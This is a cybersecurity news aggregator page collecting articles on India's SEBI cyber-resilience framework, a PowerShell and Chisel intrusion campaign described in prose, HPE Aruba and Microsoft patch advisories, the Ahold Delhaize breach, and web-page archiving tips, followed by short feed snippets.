Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Why SEBI’s New Gui ...

 Features

Beginning in January, investment and financial firms that fall under the Securities and Exchange Board of India (SEBI) will face some of the most comprehensive cybersecurity regulations on the planet.  SEBI’s 205-page Cybersecurity and Cyber Resilience Framework (CSCRF) for Regulated Entities (REs) was published in   show more ...

August and will take effect on Jan. 1, 2025 for organizations that are already under existing SEBI cybersecurity circulars, and April 1, 2025 for those that will be covered by CSCRF for the first time.  The document is a well thought-out blueprint for strong cybersecurity – and requires investment firms, asset managers and other REs to adopt stringent controls and practices that culminate in in-depth auditing and reporting requirements.  Also read: Mandatory Dark Web Monitoring for Indian Companies: SEBI Bolsters Cybersecurity Measures From Broad Goals and Functions to Specific Practices  The framework is based on the five cyber resiliency goals adopted from the Cyber Crisis Management Plan (CCMP) of the Indian Computer Emergency Response Team (CERT-In): Anticipate, Withstand, Contain, Recover, and Evolve.  Those broad goals are linked to six cybersecurity functions: Governance, Identify, Protect, Detect, Respond, and Recover. By focusing on both prevention and resilience, the framework mandates that organizations should not only secure their infrastructure but also ensure swift recovery from potential cyber incidents.  The Anticipate function within SEBI's framework emphasizes the need for "informed preparedness," effectively positioning CTI as a vital tool. By providing real-time insights into threat actors, tactics, and trends, CTI allows organizations to proactively address emerging risks. SEBI mandates that organizations conduct regular risk assessments, threat monitoring, and vulnerability scans, aligning with the intelligence-driven approach recommended for REs to maintain a state of continuous vigilance​  From there, the framework gets very in-depth and specific, and most organizations will need help meet the guidelines. For example, in the area of threat intelligence, the standards require investment organizations to implement dark web monitoring for brand intelligence and customer protection, including takedown services and monitoring for data and credential leaks, and processes for managing and incorporating vulnerability and threat alerts and advisories (see image below). CERT-In and the National Critical Information Infrastructure Protection Centre (NCIIPC) promise some support, but REs may need the services of an AI-powered comprehensive threat intelligence vendor like Cyble to fully meet the requirements.   CSCRF Requirements  The CSCRF document outlines in-depth goals for each area before launching even deeper into specifics.  [caption id="attachment_92801" align="aligncenter" width="600"] CSCRF Guidelines as recommended by SEBI (Source: SEBI)[/caption] After conducting ongoing risk assessments to identify critical systems, the area of Protection, for example, includes eight broad cybersecurity controls that the document addresses in-depth later on. These include:  Authentication and access policy, along with log collection and a documented retention policy  Network segmentation techniques to restrict access to sensitive information, hosts, and services  Layering of Full-disk Encryption (FDE) along with File-based Encryption (FE) for data protection  Separate production and non-production environments for the development of all software/ applications for critical systems and feature enhancements  Periodic audits by a CERT-In empaneled IS auditing organization assess implementation and compliance  Vulnerability Assessment and Penetration Testing (VAPT) to detect vulnerabilities in the IT environment for all critical systems, infrastructure components and other IT systems, based on a comprehensive VAPT scope  Application Programming Interface (API) security and Endpoint security solutions “shall be implemented with rate limiting, throttling, and proper authentication and authorisation mechanisms”  Mandatory ISO 27001 certification for Market Infrastructure Institutions (MIIs) and Qualified Res  Other Critical Requirements in SEBI's Framework: Why CTI is Key  Governance and Risk Management: SEBI's guidelines require each RE to maintain a Cybersecurity and Cyber Resilience policy approved by senior management. As cyber threat landscapes evolve, CTI informs these policies by providing insight into sector-specific threats, aiding in more accurate risk evaluation and priority setting.  Continuous Monitoring and Detection: The framework underscores the importance of Security Operations Centers (SOC) and continuous monitoring. By incorporating CTI feeds into SOC workflows, organizations gain insights into active threats and are better positioned to detect anomalies and respond swiftly. SEBI also mandates periodic red teaming exercises, which benefit significantly from CTI data to simulate real-world attack scenarios accurately​(2024-0118-Policy-SEBI_C…).  Incident Response and Recovery: SEBI's emphasis on a comprehensive Incident Response Management plan highlights CTI’s role in responding to and recovering from attacks. With intelligence on threat actors and their techniques, organizations can develop proactive response strategies, minimizing the impact of incidents and ensuring rapid recovery.  Benefits of Integrating CTI for SEBI-Regulated Entities  Enhanced Threat Awareness: Regular updates on global threat trends enable organizations to anticipate and mitigate cyber risks more effectively.  Operational Efficiency: By prioritizing threats based on CTI insights, teams can focus on high-risk issues, optimizing resource allocation.  Improved Compliance: Integrating CTI helps meet SEBI's compliance requirements, particularly in areas like real-time threat detection, reporting, and auditing.  Reporting, Response and Beyond  The reporting requirements alone may be a challenge for some – see a sample VAPT report below:  The framework is meant to be an ongoing, adaptive process. The document states that response should always be followed by further evolution of security controls:  “Adaptive and evolving controls to tackle identified vulnerabilities and to reduce attack surfaces shall be created and incorporated into the RE’s cybersecurity and cyber resilience strategy.”  Closing Notes and Recommendations In the wake of SEBI’s updated CSCRF, CTI has become essential for security teams across India’s financial sector. By proactively aligning security operations with SEBI’s guidelines and leveraging CTI for informed threat response, organizations can achieve both compliance and resilience. In a landscape where threats are growing more sophisticated and frequent, CTI offers the intelligence edge necessary to defend against emerging risks, ensuring robust protection for critical financial infrastructure.  CSCRF won’t be easy for some organizations to implement, but the end result could be a secure securities industry that’s the envy of the world. And to further help financial institutions gain this edge CTI platforms like Cyble can be a game changer. 

image for Harnessing Chisel fo ...

 Firewall Daily

The Cyble Research and Intelligence Lab (CRIL) has recently uncovered a sophisticated multi-stage infection chain, primarily driven by PowerShell scripts. This campaign, which targets organizations through a variety of attack vectors, has been designed to maintain persistence, bypass security measures, and enable   show more ...

further malicious activities.   One of the most interesting findings from this analysis is the utilization of the Chisel tunneling tool, which plays a crucial role in the adversary's lateral movement and command-and-control (C&C) operations.  Key Takeaways from the PowerShell Campaign  CRIL's in-depth investigation into this PowerShell-based attack revealed an intricate multi-stage infection process, beginning with a seemingly innocuous LNK file. Once executed, this LNK file triggers the first in a series of obfuscated PowerShell scripts that download additional malicious payloads. Each stage of the infection builds on the last, with the ultimate goal of enabling the threat actor (TA) to maintain a foothold on the compromised system and network.  The use of PowerShell scripts in this campaign highlights the threat actor's proficiency in leveraging native Windows tools to execute complex attack strategies while evading detection. Additionally, the discovery of a Chisel DLL file suggests that the TA is also using this tool to establish covert tunneling connections, allowing them to bypass firewalls and infiltrate protected internal networks.  The Multi-Stage PowerShell Campaign  The attack begins with a malicious LNK (Windows shortcut) file that serves as the initial infection vector. While the exact delivery mechanism of the LNK file is unclear, once executed, it triggers a PowerShell script that begins the infection process. This script, which is obfuscated to avoid detection, downloads and executes a secondary PowerShell script from a remote server. The aim of this first-stage script is to establish persistence on the victim's system by setting up further malicious payloads.  Once the first PowerShell script is executed, it drops a second-stage PowerShell script along with several batch files designed to ensure that the infection persists even after a system reboot. The second-stage script maintains communication with the attacker's C&C server, allowing it to fetch the third and final stage of the infection.  The third-stage PowerShell script is the most complex, continuously communicating with the C&C server to receive a chain of commands. These commands can be used to perform various malicious activities, including data exfiltration, lateral movement within the network, and further payload deployment.  PowerShell and Obfuscation Techniques  A critical component of this attack is the use of PowerShell as the primary tool for executing the attack chain. PowerShell’s powerful capabilities allow the adversary to bypass traditional security mechanisms and remain stealthy. The first PowerShell script, for instance, sets the execution policy to “Bypass,” which allows it to run without being blocked by standard Windows defenses. Additionally, the script is executed in hidden mode, making it invisible to the user.  Second and Third Stages of the Attack  The second-stage PowerShell script maintains communication with the C&C server to retrieve additional malicious payloads. Like the first stage, it decodes and executes these scripts, continuing the infection chain.  In the third stage, the PowerShell script operates with greater complexity. It sets up variables to control its interaction with the C&C server, including $CHAIN for tracking the communication status and $JITTER to introduce random delays to avoid detection by security systems. The script also continues to retrieve system information, such as the hostname, which it Base64-encodes before using it to establish a connection with the server.  At this stage, the script can receive and execute a series of commands from the C&C server. If the command is not a “WAIT” instruction, the script executes the provided PowerShell code. The communication between the infected system and the C&C server is designed to be persistent and stealthy, with data being transferred in small chunks to evade detection by traditional security measures.  Leveraging Chisel for Covert Operations  An intriguing aspect of this campaign is the use of Chisel, a fast TCP/UDP tunneling tool that allows the attacker to establish a secure communication channel over HTTP and bypass firewall restrictions. Chisel is commonly used by threat actors to enable lateral movement within compromised networks and maintain persistence even when traditional communication channels are blocked.  CRIL’s analysis found a Chisel DLL file on the infected system, suggesting that the TA may use Chisel for establishing a tunnel between the compromised machine and the C&C server. This tunnel allows the attacker to communicate with internal systems that are otherwise shielded from external access.  The Chisel tool can be used for a variety of malicious purposes. One of the primary functions is to scan internal networks for additional vulnerable systems. By deploying the Chisel client on a compromised machine, the TA can use it as a SOCKS proxy to bypass network defenses and perform reconnaissance using tools like Nmap.  Once internal systems are identified, the attacker can use Chisel to create a tunnel that enables them to move laterally across the network, gaining access to systems that were previously isolated. Furthermore, the Chisel client allows the attacker to enable internet access for machines that may otherwise be disconnected, enabling them to download additional payloads and maintain control over the compromised network.  Proxying and Evasion Techniques  The campaign also utilizes the Netskope proxy, which helps the attacker obfuscate their C&C communication. By routing traffic through the Netskope proxy, the TA can evade detection by traditional network defenses, such as firewalls and intrusion detection systems. This proxy-based communication provides a flexible and secure method for the TA to interact with the infected network and maintain control over the compromised systems.  The use of Chisel in combination with the Netskope proxy allows the attacker to bypass firewalls, scan internal systems, and exfiltrate data without being detected. This multi-layered approach makes it extremely difficult for defenders to identify and block the attack, as it leverages legitimate tools and proxies to hide malicious activity. 

image for HPE Issues Urgent Pa ...

 Cyber News

Hewlett Packard Enterprise (HPE) has issued critical security patches to address several vulnerabilities affecting its Aruba Networking Access Point products. These vulnerabilities (CVE-2024-42509 and CVE-2024-47460), including two particularly severe flaws, could allow unauthenticated attackers to execute arbitrary   show more ...

commands remotely, potentially compromising the security of affected systems.  The flaws impact both Instant AOS-8 and AOS-10 software running on various models of Aruba access points, prompting immediate attention from administrators and network security teams.  HPE Security Patches for CVE-2024-42509 and CVE-2024-47460  The security vulnerabilities identified in the Aruba access points could have serious consequences if exploited by malicious actors. HPE released patches to address six vulnerabilities in total, two of which are classified as critical due to their potential for remote code execution (RCE). These vulnerabilities affect several versions of Aruba’s operating systems, Instant AOS-8 and AOS-10.  The most critical of these vulnerabilities are identified as CVE-2024-42509 and CVE-2024-47460, both of which are command injection flaws in the Command Line Interface (CLI) service. These flaws allow attackers to send specially crafted packets to the PAPI (Aruba's Access Point Management Protocol) UDP port 8211, potentially enabling unauthenticated remote code execution.  CVE-2024-42509: This vulnerability has been assigned a high severity score of 9.8 out of 10. Successful exploitation could allow an attacker to execute arbitrary code as a privileged user on the affected system’s underlying operating system.  CVE-2024-47460: This issue carries a slightly lower severity score of 9.0 but still represents a significant risk. It also enables attackers to execute arbitrary commands remotely, with similar consequences to CVE-2024-42509.  Both vulnerabilities are critical because they allow unauthenticated attackers to gain control over the access point, potentially compromising the entire network.   Affected Versions and Products  The vulnerabilities impact a range of Aruba access point models running specific versions of Instant AOS-8 and AOS-10. The affected versions are as follows:  Instant AOS-10.4.x.x: Versions 10.4.1.4 and earlier  Instant AOS-8.12.x.x: Versions 8.12.0.2 and earlier  Instant AOS-8.10.x.x: Versions 8.10.0.13 and earlier  HPE’s advisory notes that these vulnerabilities do not affect products that have reached the End of Maintenance (EoM) status. Therefore, access points running AOS-10.6.x.x, AOS-10.5.x.x, and several earlier versions are not addressed by the current patch release.  Importantly, Aruba’s Mobility Conductor, Mobility Controllers, and SD-WAN Gateways are not affected by these vulnerabilities, nor are Aruba InstantOn Access Points.  Security Patches and Mitigation Recommendations  HPE has released critical security patches to mitigate the risks associated with these vulnerabilities. To address the specific flaws in Instant AOS-8 and AOS-10, users should update their systems to the following patched versions:  AOS-10.7.x.x: Version 10.7.0.0 and above  AOS-10.4.x.x: Version 10.4.1.5 and above  Instant AOS-8.12.x.x: Version 8.12.0.3 and above  Instant AOS-8.10.x.x: Version 8.10.0.14 and above  These updated software versions contain critical security patches that resolve the vulnerabilities discussed in the advisory. Network administrators are strongly encouraged to apply these patches promptly to ensure the continued security and integrity of their Aruba access point infrastructure.  For devices running Instant AOS-8, HPE recommends enabling cluster security using the cluster-security command. This can help prevent exploitation of CVE-2024-42509 and CVE-2024-47460. However, for AOS-10 devices, the company advises blocking access to UDP port 8211 from untrusted networks, as the cluster security feature is not available for this version.  Additional Security Considerations  While the critical security patches for these vulnerabilities are essential, HPE also provides additional security advice to further safeguard Aruba access points. For example, to mitigate risks related to other vulnerabilities, including authenticated remote command execution and arbitrary file creation, administrators should restrict access to the CLI and web-based management interfaces. It’s recommended to segregate these interfaces on a dedicated VLAN or control them through firewall policies to reduce the attack surface.  Several other vulnerabilities were also discovered, including:  CVE-2024-47461: An authenticated remote code execution flaw with a severity of 7.2 (high) that can be exploited by attackers with privileged access to the system.  CVE-2024-47462, CVE-2024-47463: Arbitrary file creation vulnerabilities that could lead to remote command execution.  CVE-2024-47464: A path traversal vulnerability that could give attackers unauthorized access to files.  These vulnerabilities emphasize the need for a comprehensive approach to network security, beyond just patching critical bugs. By implementing robust access controls and ensuring that all management interfaces are properly secured, organizations can reduce the likelihood of successful exploitation.  The Importance of Timely Patching  The release of these HPE security patches highlights the ongoing need for organizations to maintain a proactive approach to cybersecurity. Timely application of patches for critical vulnerabilities, such as the ones impacting Aruba access points, is essential for protecting network infrastructure from potential exploitation.  Security experts recommend that organizations establish a routine patch management process, ensuring that security updates—like those for the Aruba access point vulnerabilities—are deployed as soon as they become available. This helps minimize the window of opportunity for attackers and reduces the risk of compromise. 

image for Ahold Delhaize Confi ...

 Firewall Daily

Ahold Delhaize, one of the world’s largest grocery and eCommerce companies, is grappling with a cybersecurity breach affecting its U.S. operations. The Ahold Delhaize cyberattack, which has been linked to a nationwide disruption in payments and services, has led to a series of measures taken by the company to   show more ...

mitigate the impact and protect its systems. Ahold Delhaize USA, the American subsidiary of the Dutch multinational, confirmed the issue on November 8, 2024, announcing that certain systems had been taken offline to contain the breach.   The Ahold Delhaize data breach primarily impacted a number of the company’s U.S. pharmacy locations and eCommerce operations across various platforms. Among the affected brands are major grocery chains such as Food Lion, The Giant Company, Hannaford, Stop & Shop, and Giant Food. While these stores remained open for business, some services—particularly pharmacy transactions and online orders—were disrupted for several days.   Immediate Response to the Ahold Delhaize Cyberattack   Upon detecting the cyberattack on Ahold Delhaize USA’s network, security teams moved swiftly into action. In a statement released on November 8, the company disclosed that it had enlisted external cybersecurity experts and notified law enforcement agencies to assist in the ongoing investigation.   “We immediately began investigating the issue with the help of external cybersecurity experts,” the company said in its statement. “We have also notified law enforcement, and our teams are taking steps to assess and mitigate the issue. This includes taking some systems offline to help protect them.”   Despite the breach, Ahold Delhaize confirmed that all its U.S. stores remained operational, although certain services were temporarily unavailable. For example, several Hannaford locations in Maine were unable to process debit card or gift card transactions, and the Hannaford website was down for several days. Similarly, other Ahold Delhaize USA pharmacies and eCommerce platforms faced disruptions as the company worked to secure its network.   Impact on Ahold Delhaize USA Brands   The cyberattack on Ahold Delhaize USA has had wide-reaching effects across the company’s various U.S. brands. Ahold Delhaize’s flagship supermarkets, including Food Lion and Stop & Shop, were among the hardest hit, though all stores remained open for business. However, customers were warned about potential delays in product deliveries and restocking efforts.   In some locations, particularly those served by Hannaford and Stop & Shop, in-store signage informed customers that technology outages might affect their shopping experience, including product delivery timelines. The company issued an apology for any inconvenience caused and reassured customers that the security of their personal information remained a top priority.   The incident has raised concerns about the vulnerability of large retail and grocery networks to cyberattacks, particularly as data extortion and ransomware attacks continue to rise globally.   Ahold Delhaize's Commitment to Addressing the Cyberattack   In response to the ongoing data breach at Ahold Delhaize, the company emphasized that it was actively working to resolve the issue and minimize any further disruptions. In its official statement, Ahold Delhaize reassured customers and partners that its teams were focused on both the immediate and long-term recovery efforts.   “We are taking extensive measures to further protect our systems and ensure the security of our customers, associates, and partners,” the company said. “We deeply apologize for any inconvenience this issue may have caused and are committed to restoring full service as quickly as possible.”   Despite the ongoing nature of the investigation and remediation, Ahold Delhaize remains confident that the breach has not compromised any customer data. The company’s security teams are working tirelessly to ensure that the network is fully secured and that affected services will be restored in due course.   Broader Context: The Rise of Cybersecurity Threats in 2024   The cyberattack on Ahold Delhaize USA comes at a time when data breaches and cyberattacks are increasingly targeting large corporations. Experts have dubbed 2024 the "Year of the Cyberattack," with a surge in ransomware, data extortion, and other malicious activities targeting businesses and consumers alike. As organizations across the globe continue to digitize operations, the risks associated with cyber threats have never been more pronounced.   Ahold Delhaize itself has faced a challenging year, with several other factors affecting its performance. In addition to the cybersecurity breach, the company reported a dip in quarterly sales, primarily due to product recalls, store closures, and the divestment of its FreshDirect subsidiary. The Listeria outbreak involving Boar's Head Deli meats, which led to a mass recall, further impacted the company's bottom line.   Despite these challenges, Ahold Delhaize has been able to maintain growth in online sales, with a particular emphasis on its e-commerce grocery platforms. The company’s commitment to innovation and technology is seen as a key driver of its long-term growth, even in the face of disruptions like the current cyberattack. 

image for How to save web page ...

 Tips

Contrary to the popular belief that anything online stays online, the internet doesnt remember everything. In a previous post in this series, we examined no fewer than nine scenarios in which you could lose access to online content. We also provided a detailed guide to what information you absolutely must (and   show more ...

preferably quickly) back up to your computer and how to do it. Today, well discuss how to easily save web pages to your computer, how to organize these archives, and what to do if your favorite site has gone AWOL. Lets say you want to save a blog post with a recipe, compile a bibliography for your research paper, or even preserve a specific online publication for legal purposes. All of the above are published as web pages — which have a tendency to disappear at the wrong moment. Want to reminisce about music news and gossip from 2005? Good luck with that — the MTV News site shut down and all its articles and interviews are no longer available. Check references in Wikipedia articles? 11% of them lead nowhere, even though they were working when the article was published. This phenomenon of link rot — the gradual deletion or relocation of online content — is rapidly becoming a major problem. 38% of pages that existed ten years ago are no longer accessible today. So, if theres a web page out there that you like or need, the wise move would be to create a backup. How to save a web page to your computer Since a web page consists of dozens or even hundreds of files, backing it up will require a bit of effort. Here are the main ways to do it: Save only the text as an HTML file. Select the Save page as menu command or button in your browser and then select Webpage, HTML Only. This will only save the text of the web page, without any graphics or other eye candy. Save text and images. The Webpage, Complete option will create, besides an HTML file, a folder with the same name containing all graphic elements, styles, and scripts from the page. A downside of this option is that saving a lot of auxiliary files clutters your drive. The Webpage, Single File option is more convenient, bundling the web page and all its resources into a single .mhtml file. This will open freely in Chrome or Edge, but other browsers may have issues. This option is not available in all browsers, but if you install the SingleFile extension (available for most browsers), you can save the entire web page and its media content as a single HTML file that opens perfectly fine in all modern browsers. Print to PDF. To preserve the main content of the page, but scrap menus and banners, your best option is Print to PDF. The resulting file will open on any computer. With any of these options, make sure that the main text that you actually want to keep is still readable when you open the document. An easier way to save a web page The methods described above are a bit time-consuming and create clutter on your hard drive. For greater convenience, use a dedicated service such as Pocket (formerly Read It Later), wallabag, or Raindrop.io. They all work the same way: you send a link from which the service retrieves a document with all the illustrations, cleans the page of anything unnecessary, and saves it in your personal online storage. Even if the original page gets deleted or modified, the version you want will remain in your archive. These services allow you to group and sort your links, search for text inside, and view your saved pages on any device. For desktop, theres an extension available for all the major browsers; and for mobile, theres an app. All these services offer an eternal archive only with a premium subscription, meaning youll have to pay for the convenience. That said, Wallabag is open-source — you can install it on your own server and not pay for third-party services or worry about the service getting shut down. Some note-taking apps can also save complete web pages. These include Evernote, where the feature is called Web Clipper. How to save a web page for others If its not just a copy for yourself that you need, but to share a certain version of the page with others, youll need a public-archiving service. The best-known is the Internet Archive (archive.org) and its Wayback Machine. Other options include archive.today (aka archive.is), perma.cc, and megalodon.jp. They all work on a similar principle: either at the users request or automatically they visit web pages and save a copy on their servers. To request archiving of a web page, go to web.archive.org and enter the full address in the Save Page Now box. After you click Save, a window appears describing all of the pages loaded components, followed by a permanent link to the site in its preserved state. It looks like this: https://web.archive.org/web/20240924045754/https://www.kaspersky.com/blog. The link shows both the address of the saved page and the exact time of saving — perfect for archival purposes. Registering on archive.org lets you manage a collection of such links, take screenshots of saved sites, and download copies of them in the special web-archiving format. On archive.org, you can view previously saved versions of websites and save the current state of any site — for example, our blog On opening the archive link, youll see the saved page with a timestamp indicating when the snapshot was taken. This feature is useful for tracking and demonstrating changes in website data: price fluctuations, product description updates, edited news reports, and deleted information. The latter is particularly important for historical and cultural researchers based on defunct websites. Below, you can check out one of the first versions of GeoCities, a once popular web-hosting service that let you create home pages, express yourself, and find friends with shared interests long before social networks. Its only thanks to the Wayback Machine that we can see it now — the site closed shop in 2016. A gift for the old-timers: one of the earliest versions of GeoCities.com How to find deleted internet content or an old version of a website To view an old version of any website: Open archive.org. Enter the full address of the website or a specific page in the box next to the logo and click Enter. If the exact URL is unknown, you can enter the name of the website or words that describe it well. Select the desired website from the list. The results show at a glance how many copies are archived and for what period. Use the calendar to select which of the saved copies of the site you wish to view. Dates for which there is a saved copy are circled — the larger the circle, the more copies were made that day. Click the desired date and inspect the saved site. Note that loading a copy from the archive may take a few minutes. The calendar graph above the site copy lets you navigate to older and newer copies. How to explore old versions of sites at web.archive.org You can copy the link to the retrieved copy from the address bar to access the archived site directly, bypassing the search interface. What if archive.org cant help The foundation behind archive.org sometimes complies with the requests of copyright holders and other authorized parties to exclude certain sites from the Wayback Machine. Also, the service never aimed to preserve the entire internet, so it may happen that the page you need was never indexed. In such cases, try looking for it in other time capsules. Archive.today (aka archive.is) doesnt automatically save pages — it does so only at the request of users. Among other things, this does away with having to follow instructions for search robots (robots.txt), and means that the archive contains documents that arent available in the Wayback Machine. Another important web-archiving project is perma.cc, created by a consortium of major world libraries. However, its only free for participating organizations. Individual users can subscribe to a paid plan, with pricing based on the number of archived links. A powerful alternative to specialized archives is search engines cached content. To index any web page, search engines retrieve its text, so a crude but readable version of almost any page can be found there. For a long time, Googles cache was the most accessible, but in early 2024, the search giant removed the direct link to its cache from search results. The service still works, but accessing it directly is very difficult. Therefore, its better to use browser extensions that make internet archives easier to work with. For example, if a link takes you to a deleted page or a defunct website, the Web Archives extension redirects you straight to an archived copy of this page at web.archive.org, archive.today, or perma.cc, or shows a cached version of it from Google, Bing, or Yandex. How to save data from other online services Besides web pages, there are many other online services — from photo albums and notes to social networks — that hold data you also may want to save. Of course, recommendations vary for different types of data and specific services, but for your convenience, weve grouped all related instructions under the backup tag. You can read about creating backups for: Notion Telegram Whats?pp 2FA authenticator apps Other services And dont forget to safeguard your backups against ransomware and spyware!

image for Microsoft Patch Tues ...

 Security Tools

Microsoft today released updates to plug at least 89 security holes in its Windows operating systems and other software. November’s patch batch includes fixes for two zero-day vulnerabilities that are already being exploited by attackers, as well as two other flaws that were publicly disclosed prior to today.   show more ...

The zero-day flaw tracked as CVE-2024-49039 is a bug in the Windows Task Scheduler that allows an attacker to increase their privileges on a Windows machine. Microsoft credits Google’s Threat Analysis Group with reporting the flaw. The second bug fixed this month that is already seeing in-the-wild exploitation is CVE-2024-43451, a spoofing flaw that could reveal Net-NTLMv2 hashes, which are used for authentication in Windows environments. Satnam Narang, senior staff research engineer at Tenable, says the danger with stolen NTLM hashes is that they enable so-called “pass-the-hash” attacks, which let an attacker masquerade as a legitimate user without ever having to log in or know the user’s password. Narang notes that CVE-2024-43451 is the third NTLM zero-day so far this year. “Attackers continue to be adamant about discovering and exploiting zero-day vulnerabilities that can disclose NTLMv2 hashes, as they can be used to authenticate to systems and potentially move laterally within a network to access other systems,” Narang said. The two other publicly disclosed weaknesses Microsoft patched this month are CVE-2024-49019, an elevation of privilege flaw in Active Directory Certificate Services (AD CS); and CVE-2024-49040, a spoofing vulnerability in Microsoft Exchange Server. Ben McCarthy, lead cybersecurity engineer at Immersive Labs, called special attention to CVE-2024-43602, a remote code execution vulnerability in Windows Kerberos, the authentication protocol that is heavily used in Windows domain networks. “This is one of the most threatening CVEs from this patch release,” McCarthy said. “Windows domains are used in the majority of enterprise networks, and by taking advantage of a cryptographic protocol vulnerability, an attacker can perform privileged acts on a remote machine within the network, potentially giving them eventual access to the domain controller, which is the goal for many attackers when attacking a domain.” McCarthy also pointed to CVE-2024-43498, a remote code execution flaw in .NET and Visual Studio that could be used to install malware. This bug has earned a CVSS severity rating of 9.8 (10 is the worst). Finally, at least 29 of the updates released today tackle memory-related security issues involving SQL server, each of which earned a threat score of 8.8. Any one of these bugs could be used to install malware if an authenticated user connects to a malicious or hacked SQL database server. For a more detailed breakdown of today’s patches from Microsoft, check out the SANS Internet Storm Center’s list. For administrators in charge of managing larger Windows environments, it pays to keep an eye on Askwoody.com, which frequently points out when specific Microsoft updates are creating problems for a number of users. As always, if you experience any problems applying any of these updates, consider dropping a note about it in the comments; chances are excellent that someone else reading here has experienced the same issue, and maybe even has found a solution.

image for 2 Zero-Day Bugs in M ...

 Feed

The November 2024 Patch Tuesday update contains a substantially high percentage of remote code execution (RCE) vulnerabilities (including a critical issue in Windows Kerberos), and two other zero-day bugs that have been previously disclosed and could soon come under attack.

 Feed

Ubuntu Security Notice 7102-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.40 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 24.04 LTS, and Ubuntu 24.10. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

 Feed

Debian Linux Security Advisory 5810-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

 Feed

Debian Linux Security Advisory 5811-1 - An out-of-bounds write vulnerability when handling crafted streams was discovered in mpg123, a real time MPEG 1.0/2.0/2.5 audio player/decoder for layers 1, 2 and 3, which could result in the execution of arbitrary code.

 Feed

Debian Linux Security Advisory 5809-1 - Multiple vulnerabilities have been found in the Symfony PHP framework which could lead to privilege escalation, information disclosure, incorrect validation or an open redirect.

 Feed

Red Hat Security Advisory 2024-9092-03 - An update for freerdp is now available for Red Hat Enterprise Linux 9. Issues addressed include heap overflow, integer overflow, and out of bounds read vulnerabilities.

 Feed

Cybersecurity researchers have disclosed new security flaws impacting Citrix Virtual Apps and Desktop that could be exploited to achieve unauthenticated remote code execution (RCE) The issue, per findings from watchTowr, is rooted in the Session Recording component that allows system administrators to capture user activity, and record keyboard and mouse input, along with a video stream of the

 Feed

Cybersecurity researchers are calling attention to a new sophisticated tool called GoIssue that can be used to send phishing messages at scale targeting GitHub users. The program, first marketed by a threat actor named cyberdluffy (aka Cyber D' Luffy) on the Runion forum earlier this August, is advertised as a tool that allows criminal actors to extract email addresses from public GitHub

 Feed

Threat actors with ties to the Democratic People's Republic of Korea (DPRK aka North Korea) have been found embedding malware within Flutter applications, marking the first time this tactic has been adopted by the adversary to infect Apple macOS devices. Jamf Threat Labs, which made the discovery based on artifacts uploaded to the VirusTotal platform earlier this month, said the Flutter-built

 Feed

Behavioral analytics, long associated with threat detection (i.e. UEBA or UBA), is experiencing a renaissance. Once primarily used to identify suspicious activity, it’s now being reimagined as a powerful post-detection technology that enhances incident response processes. By leveraging behavioral insights during alert triage and investigation, SOCs can transform their workflows to become more

 Feed

Cybersecurity researchers have flagged a new ransomware family called Ymir that was deployed in an attack two days after systems were compromised by a stealer malware called RustyStealer. "Ymir ransomware introduces a unique combination of technical features and tactics that enhance its effectiveness," Russian cybersecurity vendor Kaspersky said. "Threat actors leveraged an unconventional blend

 Guest blog

Scammers have leapt at the opportunity to exploit vulnerable UK residents by sending bogus messages telling them they need to take action to receive help with their winter heating bills. Read more in my article on the Tripwire State of Security blog.

 AI

In episode 24 of The AI Fix, Mark makes an unforgivable error about the Terminator franchise, our hosts wonder if a "seductive" government chatbot will make it easier to talk about tax, a radio station abandons its three month AI experiment after a week, and OpenAI parks its tanks on Google’s lawn. Graham   show more ...

gets cosmic and wonders why we aren’t surrounded by advanced alien AIs, our hosts argue about whether the moon landings or the invention of the cheese sandwich were more consequential events in human history, and Mark tells Graham that artificial superintelligence is just around the corner. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley.

 Cyber Security News

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. Username or E-mail Password Remember Me     Forgot Password La   show more ...

entrada FBI Warns US Organizations of Fake Emergency Data Requests Made by Cybercriminals – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 cost

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. La entrada Cyberattack Cost Oil Giant Halliburton $35 Million – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. La entrada Debt Relief Firm Forth Discloses Data Breach Impacting 1.5   show more ...

Million People – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. La entrada Veeam Patches High-Severity Vulnerability as Exploitation of   show more ...

Previous Flaw Expands – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. La entrada Law Firm Data Breach Impacts 300,000 Presbyterian Healthcare   show more ...

Patients – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. La entrada Many Legacy D-Link NAS Devices Exposed to Remote Attacks via   show more ...

Critical Flaw – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. La entrada Palo Alto Networks Addresses Remote Code Execution Vulnerability   show more ...

Claims – Source: www.securityweek.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 credit card

The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free.       Thank you. The CISO2CISO Advisors Team. La entrada 200,000 SelectBlinds customers have their card details skimmed   show more ...

